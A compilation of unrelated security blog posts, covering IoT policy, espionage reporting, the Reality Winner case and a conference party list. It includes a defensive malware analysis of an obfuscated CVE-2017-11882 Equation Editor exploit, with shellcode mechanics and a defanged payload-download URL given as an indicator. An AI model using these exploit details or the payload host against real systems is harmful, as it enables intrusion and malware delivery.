  • the process you will use to create the roadmap: this is where your expertise has to shine; you must know exactly how you’re going to go about creating the roadmap; what happens before, during and after the roadmap session(s); what the output will look like, and how you’re going to get the client to co-develop the roadmap;
  • your confidence: you have to be confident that this is the right thing to do, the right way to do it and that it delivers substantial value to your client.

This is not an easy road by any means, but there is a way to build up to it:

  • Start by taking proposals you’ve done in the past and turning them into roadmaps. Can you make them look like high-level project plans? Can the work be clearly grouped into relatively small chunks where each chunk builds on the previous one? Is there value from each chunk of work?
  • Define your process for creating a roadmap. Before you head into a roadmap session, there’s likely some pre-work that you need to do, for example running an analysis on their website (if that’s part of the problem) or doing an analysis of their business using something like the Tornado Method. Then define what the output would typically look like, and what you need to do during a roadmap session to get there. Then define what happens after the session. Turn it all into a collection of checklists.
  • Trial and refine your process. Find a friend or a willing client to be your first roadmap client. Follow your process and make sure you make notes of what’s working and what needs to be improved. Refine your process and repeat the exercise. Each time you do it you will gain more confidence.

Remember that a roadmap is a short, low-cost exercise and therefore relatively easy to sell to potential clients. You have to stress that the exercise delivers a roadmap that they can then use themselves, with you or with someone else; and you will follow up with a proposal if and when they’re ready for it.

A roadmap gives your client clarity on their problem and what they need to do to solve it. They may not have the expertise to do it themselves (that’s where you will eventually earn your keep), but just the process of building the roadmap provides them with peace of mind and builds trust that you can solve the problem for them.

Finally, a roadmap educates your client. They will understand that there is a well-defined process for solving the problem, the sequence in which the work needs to be done and what they get out of each part. An educated client is a collaborative, engaged and enthusiastic; your expertise just helps them solve a problem.

What you can do now

It took me about two years to move from free proposals to paid roadmaps. You can get there a lot faster because you can tap into articles like this and a growing awareness amongst professionals that even proposals are highly valuable.

I will be releasing a step-by-step guide on how to move from free proposals to paid roadmaps in the near future. To get notified when this is released, sign up for my newsletter here – you will get access to more articles like this, I promise I won’t spam you and you can unsubscribe at any time.

And if you have questions or comments, please drop me a note!


Your IoT security concerns are stupid

Lots of government people are focused on IoT security, such as this bill or this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question. Government efforts focus on vulns and patching, ignoring more important issues.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.

Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, it's primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.

Such technical analysis of events like Mirai and notPetya are ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from shipped directly from Shenzen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.

In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.

Lastly, focusing on the vendor is a tired government cliche. Chronic internet security problems that go unsolved year after year, decade after decade, come from users failing, not vendors. Vendors quickly adapt, users don't. The most important solutions to today's IoT insecurities are to firewall and microsegment networks, something wholly within control of users, even home users. Yet government policy makers won't consider the most important solutions, because their goal is less cybersecurity itself and more how cybersecurity can further their political interests. 

The best government policy for IoT policy is to do nothing, or at least focus on more relevant solutions than patching vulns. The ideas propose above will add costs to devices while making insignificant benefits to security. Yes, we will have IoT security issues in the future, but they will be new and interesting ones, requiring different solutions than the ones proposed.

Evading Static Analyzers by Solving the Equation (Editor)


As part of our efforts to self-evaluate our backend systems, we closely monitor the behavioral reports produced by our dynamic analysis system. Every detection is, in fact, cross-checked and correlated with several other pieces of information, including the output from a number of static analyzers.

A few weeks ago a small anomaly started to creep in when analyzing malicious documents: executions spawning a rogue Equation Editor process (often linked to arbitrary code executions) were no longer triggering our internal static analyzers. It was as if the malicious documents were leveraging a new CVE, possibly just added to a well-maintained document exploit builder (for instance like the old Phantom exploit builder kit, or the Metasploit framework).

One of the malicious documents (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a) was obfuscated but the process snapshot was still clearly showing the exploitation of the same buffer overflow used by CVE-2017-11882. However, the header of the OLE object (as extracted by rtfobj) was clearly different.

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882 and cf63479cefc4984309e97ed71e34a078cbf21d6a.

This quickly explained why the static analyzer didn’t assert detection of the known CVE: any string that is often used to detect CVE-2017-11882 relies on either the class name or some other byte sequence that, as shown in Figure 1, is now clearly missing. At this point, we decided to analyze the document in more detail.

OLE Object Analysis

The OLE object (as extracted by RTFScan and viewed by SS viewer) clearly shows that even its stream type is somewhat generic (normally an Equation Editor OLE object contains an
stream as further explained here). Instead, the OLE stream is parsed as a more obscure  Ole10Native (see Figure 2).

Figure 2: An OLE object featuring an Ole10Native stream.

Figure 2: An OLE object featuring an Ole10Native stream.

There are two interesting things happening here: (i) Equation Editor is still invoked to process the OLE object regardless of the OLE format, and (ii) Equation Editor is able to parse this new and generic format. As we show in Figure 3, the first is achieved because the CLSID is also specified inside the OLE object itself (the reader can find a nice walk through on how this is done here).

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

As for the stream itself, its type is not something we see every day. Equation Editor, on the other hand, seems to know this format quite well, and in fact it parses the object without raising any issue: it selectively reads and tests specific bytes (the first and third byte of the MTEF header and the first two of the TYPESIZE header), and if some specific values are found (as shown in Figure 4), Equation Editor is finally convinced to parse the FONT record as well, triggering once again the same buffer overflow that is normally exploited in CVE-2017-11882.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

Shellcode Analysis

The vulnerability exploited to execute the shellcode is indeed CVE-2017-11882; as soon as the FONT record is parsed, the control flow is transferred to 0x445203.

font record

At this address, a RET instruction will be executed to transfer control to the shellcode stored in a buffer located in lieu of the FONT record (this exact method of executing a shellcode is also used by CVE-2017-0802 and further explained here):

Figure 5: Shellcode stored as FONT name inside the FONT record.

Figure 5: Shellcode stored as FONT name inside the FONT record.

The shellcode also is using an interesting way to find itself in memory. Unlike other malicious documents exploiting CVE-2017-11882, in our case, the sample does not rely on the
API to divert execution. Rather, it searches the OLE stream itself to locate the entry point of the shellcode. To succeed, it needs the following three hardcoded values:

  • Address 0x0045BD3C: this address references an object that contains a pointer to another temporary structure (see Table 3 in Appendix for more details). This temporary structure points to the beginning Ole10Native stream as loaded in memory.
  • Address 0x004667B0: this address points to the imported function GlobalLock.
  • 0x11F: the entry point in the shellcode from where it will start executing.

These three values are then used as follows:

  1. First, the shellcode retrieves the handle of the memory object from 0x0045BD3C.
  2. Then the handle so retrieved is passed as parameter and used to invoke the GlobalLock API.
  3. The pointer returned references the first byte of the OLE stream in memory. The shellcode now knows where it is residing in the memory and starts executing from StartOfShellcode+0x11F.

The sample goes on by downloading a file from hxxp://b.reich[.]io/hnepyp.scr, saving it on disk as name.exe, and executing it. In this report, we omit the analysis of this specific binary, as it is yet another pony variant. Were the reader interested, VirusTotal has a full report here (sha1: 2bcd81a9f077ff3500de9a80b469d34a53d51f4a); all IOCs are also listed in the Appendix, Table 1.

Why Static Analysis is not Enough

While in some cases static analysis can detect if a specific vulnerability is exploited, obfuscated samples often present quite a challenge even for the most sophisticated analyzer. In our case, a simple pattern match is not even possible: the only bits of information we can use to write a detection rule is the CLSID and the 5 bytes that are constant in the MathType OLE object (the OLE object used by Equation Editor).

A hypothetical static checker would need to:

  1. Extract the OLE object from the document
  2. Parse the OLE header and check if it is pointing to the Equation Editor CLSID
  3. Extract the Ole10Native stream
  4. Parse it and get the FONT record
  5. Check its actual length
  6. And finally, verify that the last four bytes of the buffer corresponds to an address

This is not a trivial task if done statically, and overall impossible if only pattern matching is available (as it is the case if we are using YARA rules, for example). On the other hand, in Figure 6 we can see the full behavioral analysis when analyzing the sample dynamically.

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).


The sample subject of our analysis did not use any new CVEs, but relied on an unexpected new way to deliver the old and well-known CVE-2017-11882. This particular way of delivering the exploit effectively evaded all static analyzers relying on OLE’s static information. As the exploit author managed to remove (intentionally?) all non-binary strings from the exploit data, he considerably raised the bar for a static analyzer to detect this specific exploit.

Having said that, Microsoft has already issued advisory addressing this specific CVE, so previous mitigations are effective and still apply:

In conclusion, we verified whether MathType v7 (the successor of Equation Editor) was vulnerable to this specific parsing quirk when opening a Ole10Native stream,  but we are glad to report that both mitigations DEP and ASLR are enabled, thereby protecting the binary from the aforementioned vulnerabilities.


Indicator Of Compromise Description
cf63479cefc4984309e97ed71e34a078cbf21d6a SHA1 malicious document
2bcd81a9f077ff3500de9a80b469d34a53d51f4a SHA1 loki payload
hxxp://b.reich[.]io/hnepyp.scr URL loki payload

Table 1: IoCs discussed in the blogpost.

Offset Size (bytes) Description Value Comment
0 1 MTEF Version 0x2 Version 2
1 1 Generating Platform 0x8 Garbage
2 1 Generating Product 0x1 1 for Equation Editor
3 1 Product Version 0xB9 Garbage
4 1 Product Subversion 0xC9 Garbage

Table 2: Ole10Native MTEF header.

Offset Size (bytes) Description
0x0 4 Handle to the memory object storing the Ole10Native stream in memory
0x4 4 Size in memory
0x8 4 Size in memory
0x10 4 Index of the byte which will be read next from the stream
0x14 4 Unknown

Table 3: Temporary Structure Format.

The post Evading Static Analyzers by Solving the Equation (Editor) appeared first on Lastline.

Breaking ground: Understanding and identifying hidden tunnels

It’s me again – Cognito. As always, I’ve been hard at work with Vectra to automate cyberattack detection and threat hunting. Recently, we made an alarming discovery: hackers are using hidden tunnels to break into and steal from financial services firms!

Clearly, this is serious business if it involves bad guys targeting massive amounts of money and private information. But what exactly are we dealing with? Let’s dig into what hidden tunnels are and how I find them to uncover the answer.

IoT And Your Digital Supply Chain

“Money, it’s a gas. Grab that cash with both hands and make a stash”, Pink Floyd is always near and dear to my heart. No doubt the theme song to a lot of producers of devices that fall into the category of Internet of Things or IoT.

I can’t help but to giggle at the image that comes to mind when I think about IoT manufacturers. I have this vision in my head of a wild-eyed prospector jumping around after finding a nugget of gold the size of a child’s tooth. While this imagery may cause some giggles it also gives me pause when I worry about what these gold miners are forgetting. Security comes to mind.

I know, I was shocked myself. Who saw that coming?

While there is a mad rush to stake claims across the Internet for things like connected toasters, coffee makers and adult toys it seems security falls by the way side. A lot of mistakes that were made a corrected along the way as the Internet evolved into the monster that it is today are returning. IoT appears to be following a similar trajectory but, at a far faster pace.

With this pace we see mistakes like IoT devices being rolled out with deprecated libraries and zero ability to upgraded their firmware or core software. But, no one really seems to care as they count their money while they’re still sitting at the table. The problem really comes into focus when we realize that it is the rest of us that will be left holding the bag after these manufacturers have made their money and run.

Of further concern is the fractured digital supply chains that they are relying on. I’m worried that with this dizzying pace of manufacture that miscreants and negative actors are inserting themselves into the supply chain. We have seen issues like this come to the forefront time and again. Why is it that we seem hell bent on reliving the same mistakes all over again?

One of my favorite drums to pound on is the use of deprecated, known vulnerable, libraries in their code. I’ve watched talks from numerous presenters who unearthed this sort of behavior at a fairly consistent pace. What possible rationale could there be for deploying an IoT device in 2016 with an SSL library that is vulnerable to Heartbleed?

I’ll let that sink in for a moment.

And this is by no means the worst of the lot. These products are being shipped to market with preloaded security vulnerabilities that can lead to all manner of issues. Data theft is the one that people like to carry on about a fair bit but, it would be a fairly trivial exercise to compromise some of these devices and have them added to a DDoS botnet.

What type of code review is being done a lot the way by code written by outsourced third parties? This happens a lot and really does open a company up to a risk of malicious, or poor, code being introduced.

The IoT gold rush is a concern for me from a security perspective. Various analyst firms gush about the prospect of having 800 gajillion Internet enabled devices online by next Tuesday but, they never talk about how we are going to clean up the mess later on. Someone always has to put the chairs up after the party is over.

Originally posted on CSO Online by me.

The post IoT And Your Digital Supply Chain appeared first on Liquidmatrix Security Digest.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally


FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."

Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.

Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).

Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader



(3c51c89078139337c2c92e084bb0904c) [Figure 4]










Philippines-draws-three-hard-new-lines-on-china .js







Table 1: AIRBREAK downloaders

Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.

Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost


U.S. pushes NATO to ready more forces to deter Russian threat


Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen



Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).






  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.


Credential Theft

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses,, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Reality and the Espionage Act

Reality Winner 50%

Reality Winner, the first whistleblower prosecuted by the Trump administration for leaking information to the press, will spend five years in prison as punishment for making officials and the public aware of vulnerabilities in election infrastructure. This unusually long sentence breaks with precedent, and is representative of the government’s increasing willingness to use the Espionage Act to punish and imprison whistleblowers and chill journalism.

On June 3, 2017, FBI agents raided Winner's home in Georgia. Federal prosecutors suspected that Winner, an intelligence contractor who worked with the NSA, had shared classified information with journalists, and obtained a search warrant to search her house and seize her electronic devices. After the FBI agents finished searching her home, they began chatting with her, casually at first, in what eventually turned into a interrogation that ended with her arrest. Winner later said that the FBI agents never told her that she had the right to remain silent or speak with an attorney.

Two days later, The Intercept published a partially-redacted version of a classified NSA document, which concluded that hackers they believe were working with Russian military intelligence had tried to penetrate states’ election systems during the 2016 election. On June 8, Winner was formally arraigned on one charge of violating 18 U.S.C. § 793(e), a provision of the Espionage Act.

Passed in 1917, the Espionage Act was originally intended to be used against foreign spies and saboteurs during World War I. But almost immediately after the Espionage Act was enacted, it was used to prosecute anti-war activists, including socialist presidential candidate Eugene Debs. The Supreme Court shamefully upheld the convictions of anti-war protesters in a series of unanimous decisions in 1919.

In 1971, Daniel Ellsberg leaked the Pentagon Papers — a classified history of the Vietnam War, which revealed that the government had repeatedly lied to the American people — to reporters at The New York Times and Washington Post. While the Supreme Court ruled that the government could not stop the papers from publishing articles about the documents, the Nixon administration retaliated against Ellsberg by charging him under the Espionage Act. Ultimately his case was thrown out for government misconduct. He was the first person to be prosecuted under the law for giving information to journalists, but he would not be the last.

During the Obama administration, the Department of Justice prosecuted at least eight people for sharing classified information with journalists. Most of the Espionage Act cases brought by Obama’s Justice Department never made it to trial, and instead, defendants were forced to take a plea deal. That’s partly because it’s next to impossible to mount an effective defense against an Espionage Act charge.

The Espionage Act simply prohibits the unauthorized disclosure of information related to the national defense — a broad category that includes information about controversial government programs, as well as true military secrets like the nuclear codes.

Defendants charged with violating the law cannot present an argument that the leak was justified or in the public interest. To convict you under the Espionage Act, federal prosecutors don't need to prove that your leak actually put anyone in danger. All they need to prove is that defendants knew the information was "related to national defense” when they gave it to journalists.

The federal government’s classification system is governed through executive orders, which give executive branch agencies the ability to designate certain information as “confidential,” “secret,” and “top-secret” if they determine that the disclosure of the information could potentially harm national security. Since the executive branch is (at least in theory) only allowed to classify information that it believes could harm national security, all classified information is assumed to be potentially dangerous to national security — even though we know this system is regularly and systematic abused to hide controversial, embarrassing, corrupt, or illegal activity.

This is circular logic — classified information must be dangerous, because if it weren’t dangerous, it wouldn’t be classified — means that the government can argue that leaking any classified information is functionally equivalent to leaking information that you know can harm the United States.

Winner wanted to challenge this assumption that all classified information is potentially dangerous. Court filings show that her attorneys planned to argue that the NSA report on Russian hacking attempts that Winner allegedly leaked had been over-classified, and the government’s claims that the release of the document would cause “exceptionally grave damage” were without merit.

Her attorneys tried to subpoenaed a wide array of intelligence agencies, hoping to show that the information Winner allegedly leaked about Russian hacking attempts was less of a state secret and more of an open secret within the government.

They also planned to enlist an expert witness — Bill Leonard, the former head of the Information Security Oversight Office, responsible for overseeing the federal government’s entire classification system — to testify about the government’s over-classification problem.

But Winner’s case once again proved it’s hard, if not impossible, to fight an Espionage Act prosecution. A judge denied all of Winner’s attempts to subpoena government agencies and imposed draconian security precautions on her attorneys, which prohibited them from discussing Winner’s case on unsecured phone lines and conducting Google searches for information about the document Winner allegedly leaked.

Meanwhile, Winner was held in a small county jail without bail for more than a year, after prosecutors convinced a judge that Winner was a flight risk because she had criticized the United States and could speak multiple foreign languages.

Winner’s treatment was harsh even by the standard of other Espionage Act prosecutions. Others charged with leaking classified information —like Jeffrey Sterling, Stephen Kim, and John Kiriakou—were released on bond.

Finally, on June 26, 2018, after over a year of fighting the case, Winner pleaded guilty to one count of violating the Espionage Act. According to the terms of her plea deal, Winner will serve 63 months in prison, followed by three years of supervised release.

“The use of the Espionage charge prevents a person from defending themselves or explaining their actions to a jury, thus making it difficult for them to receive a fair trial and treatment in the court system," Winner’s mother, Billie Winner-Davis, said in a statement. "I do believe that whatever [Reality] did or did not do she acted with good intentions. ... We need to work toward reforming laws so that the Espionage Act is not leveraged against our citizens."

Winner’s sentence is hardly lenient. She was a first-time offender, only accused of leaking one document. She was charged with a single count of violating 18 U.S.C. § 793(e), a section of the Espionage Act that carries a maximum sentence of 10 years. Winner’s sentence is the longest sentence that a leaker has ever received in federal court. (Chelsea Manning, who was originally sentenced to 35 years in prison and later had her sentence commuted by President Obama after 7 years, was convicted at a military court-martial.)

Winner’s only crime, literally, was to share information with journalists and the American people about a foreign government’s attempt to hack U.S. voting systems. State election boards reportedly appreciated Winner’s leak, which gave them the information needed to investigate Russian hacking attempts and better secure their electronic voting infrastructure.

But the federal government treated Winner as though she were a spy. Federal prosecutors charged her with violating an anti-espionage statute that is more than a century old, while arguing that she had to remain detained without bail until trial because she had no loyalty to the United States.

The Department of Justice’s increasing use of the Espionage Act against people who share information with journalists is shameful. A country that claims to value the freedom of the press should not imprison people for speaking to journalists.

Update: On July 13, 2018, the Department of Justice announced the indictment of 12 Russian intelligence officers on charges of hacking. The grand jury indictment, which is unclassified and available to the public, includes information about Russian attempts to hack state election systems — the same information that Winner allegedly leaked to The Intercept.

Blackhat, BSidesLV and DEF CON Parties 2018


For real, we’re back once again for the Blackhat, BSidesLV and DEF CON Parties 2018. Here is the list. Please note that this is a work in progress and I’ll be sure to add more as I become aware of them.

Please note that this sched should work fine in most smart phone browsers.


Be sure to RSVP for parties listed that note that as the vast majority will not be allowing folks to register at the door. Please note that events which are not searchable, or have not directly requested I post them, will not be included here.

Got a Party?

Most importantly, if I’m missing a 2018 party here, please let me know through our contact us form and I’ll be sure to add them.

Copyright: pressmaster / 123RF Stock Photo

DateParty HostLocationTimeLink
August 7, 2018Risky Biz PartyAlexxa’s Bar7:00 PM – 10:00 PMRSVP
August 7, 2018HackerOneEyecandy Sound Lounge8:00 PM - 11:00 PMRSVP
August 7, 2018A10Libertine Social in Mandalay Bay6:00 PM - 8:00 PMRSVP
August 7, 2018Distil NetworksLight Nightclub at the Mandalay Bay9:00 PM – 12:00 AMRSVP
August 7, 2018Black Hat Social HourAureole5:30 PM - 8:00 PMRSVP
August 8, 2018Duo Security PartyFleur in Mandalay Bay7:00 PM – 9:00 PMRSVP
August 8, 2018Flashpoint PartyLibertine Social in Mandalay Bay7:00 PM – 10:00 PMRSVP
August 8, 2018LevelUPSkyfall Lounge in the Delano8:00 PM - 12:00 AMRSVP
August 8, 2018IOActive IOAsisHouse of Blues10:00 AM – 6:00 PMRSVP
August 8, 2018Cylance Blackhat Partyminus5° Ice Experience9:00 PM – 1:00 AMRSVP
August 8, 2018Rapid7 PartyOMNIA Nightclub, Caesars10:00 PM - 1:00 AMRSVP
August 8, 2018Cisco PartyTopgolf Las Vegas8:00 PM - 11:00 PMRSVP
August 8, 2018Carbon BlackBordergrill in Mandalay Bay7:00 PM – 9:00 PMRSVP
August 8, 2018JASK & DigitalshadowsEyecandy Sound Lounge8:00 PM - 10:00 PMRSVP
August 8, 2018BSidesLV Pool PartyTuscany Suites Pool10:00 PM - 4:00 AMBSidesLV badge required
August 9, 2018Bugcrowd House PartyRockhouse Bar8:00 PM – 12:00 AMRSVP
August 10, 2018IOActive Women, Wisdom, & WineCaesars Palace Suites3:00 PM - 5:00 PMRSVP
August 10, 2018QueerCon Pool PartyPalm’s Palace Pool8:00PM – 3:00AMOpen

The post Blackhat, BSidesLV and DEF CON Parties 2018 appeared first on Liquidmatrix Security Digest.

Chinese arrest 20 in major Crypto Currency Mining scam

According to Chinese-language publication Legal Daily police in two districts of China have arrested 20 people for their roles in a major crypto currency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company ( 大连昇平网络科技有限 ) that was designed to steal three types of coins.  Digibyte Coins (DGB, currently valued at USD$0.03 each),  Siacoin (SC, currently valued at $0.01 each) and DeCred coins (DCR coins, currently valued at $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

